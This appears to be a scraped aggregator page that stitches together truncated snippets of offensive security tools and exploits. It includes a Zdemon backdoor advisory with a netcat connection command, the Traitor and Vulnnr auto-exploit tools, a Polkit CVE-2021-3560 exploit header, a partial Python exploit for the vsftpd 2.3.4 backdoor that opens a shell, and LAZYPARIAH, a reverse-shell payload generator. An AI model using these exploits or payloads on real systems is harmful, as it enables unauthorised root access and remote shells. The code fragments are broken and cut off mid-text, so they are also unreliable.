More @ https://skynettools.com
The malware Zdemon listens on TCP ports 31556, 6051. Third-party attackers who can reach infected systems can execute commands made available by the backdoor.
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/d12f38e959d70af76fd263aa1933033c.txt
Vulnerability: Unauthenticated Remote Command Execution
Description: Zdemon malware listens on TCP ports 31556, 6051. Third-party attackers who can reach infected systems can execute commands made available by the backdoor.
Vuln ID: MVID-2021-0313
nc64.exe x.x.x.x 31556
002 [ PC Details ]
User name : Victim
Computer name : DESKTOP-2C3IQHO
Registered owner :
Registered organisation :
Processor name : Intel64 Family…
Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities (including most of GTFOBins) in order to pop a root shell.
It’ll exploit most sudo privileges listed in GTFOBins to pop a root shell, as well as exploiting issues like a writable docker.sock, or the recent polkit CVE-2021–3560. More routes to root will be added over time too.
Run with no arguments to find potential vulnerabilities/misconfigurations which could allow privilege escalation. Add the -p flag if the current user password is known. The password will be requested if it’s needed to analyse sudo permissions etc.
Polkit Version 0.105–26 0.117–2 Suffers a Local Privilege Escalation (LPE) exploit. This exploit allows an unprivileged user to gain root access to the Linux system. Updating the system is recommended to avoid exploitation.
More @ https://skynettools.com/
# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation
# Date: 06/11/2021
# Exploit Author: J Smith (CadmusofThebes)
# Vendor Homepage: https://www.freedesktop.org/
# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html
# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora)
# Tested on: Ubuntu 20.04, Fedora 33
# CVE: CVE-2021-3560
# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
# Set the name and display name
# Set the account as an administrator
# Set the password hash for 'password' and password hint
# Check Polkit…
A tool to efficiently discover and extract hostnames providing a large set of target IP addresses. HostHunter utilises simple OSINT techniques to map IP addresses with virtual hostnames. It generates a CSV or TXT file containing the results of the reconnaissance.
Latest version of HostHunter also takes screenshots of the targets, it is currently a beta functionality.
- Tested with Python 3.7.2.
Linux / Mac OS
- Install python dependencies.
$ pip3 install -r requirements.txt
The next few steps are only required if you would like to use the Screen Capture feature.
- Download and install the latest version of…
Create a target list or select one target, scans then exploits, done!
Vulnnr is a Vulnerability Scanner & Auto Exploiter You can use this tool to check the security by finding the vulnerability in your website or you can use this tool to Get Shells
LFI Scanners > Coming soon
XSS Scanners > Working
SQLI injection scanners > Working
Domain Scanner > Using hackerone API/finds subdoamins
CMS detector > Working
Server detector > Working
Common vulnerable files Scanner > Working
Directory Spider/Scanner > Working
Dorker > Working/Uses Googles search engine/ auto exploits
Autodorker > Working takes a list full of dorks (Dont recommend using)
Vulnscan > Scans one target
More at https://skynettools.com
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523
from telnetlib import Telnet
from signal import signal, SIGINT
from sys import exit
def handler(signal_received, frame):
# Handle any cleanup here
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")
print('Success, shell opened')
print('Send `exit` to quit shell')
More at https://skynettools.com
# Exploit Title: ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow
# Date: 09-04-2021
# Exploit Author: Jai Kumar Sharma
# Vendor Homepage: https://www.expressvpn.com/
# Software Link: https://www.expressvpn.com/vpn-software/vpn-router
# Version: version 1
# Tested on: Windows/Ubuntu/MacOS
# CVE : CVE-2020-29238
*Proof of concept*:
ExpressVPN Router's Login Panel runs on Nginx webserver, the version v1 of the router's firmware hosts web login panel on vulnerable web server
ExpressVPN Summary: A publicly known bug in the Nginx server used by the ExpressVPN Router version 1.x firmware was reported. ExpressVPN no longer ships or supports that version and all users are encouraged to upgrade to the latest version…
AVAIN is a modular vulnerability analysis / penetration testing framework for computer networks and individual machines that allows its modules to work collaboratively to achieve more sophisticated results. Once you start an analysis with AVAIN, it uses its modules to enumerate, find vulnerabilities and assess the overall security level of an IP-based network or host. During the analysis, the most relevant results are shown directly in a comprehensible way. The complete and in depth results are saved for later to enable the user to fully retrace the assessment. In addition, AVAIN automatically aggregates certain types of results during the analysis…
LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests and capture-the-flag (CTF) competitions to generate a range of reverse shell payloads on the fly.
The reverse shell payloads that LAZYPARIAH supports include (but are not limited to):
- C binary payloads (compiled on the fly): c_binary, c_binary_b64, c_binary_gzip, c_binary_gzip_b64, c_binary_hex, c_binary_gzip_hex
- Ruby payloads: ruby, ruby_b64, ruby_hex, ruby_c
- Base64-encoded Python payloads: python_b64
- Rust binary payloads (compiled on the fly): rust_binary, rust_binary_b64, rust_binary_gzip, rust_binary_gzip_b64, rust_binary_gzip_hex, rust_binary_hex
- PHP scripts containing base64-encoded Python payloads called via the system() function: php_system_python_b64
- Java classes (compiled…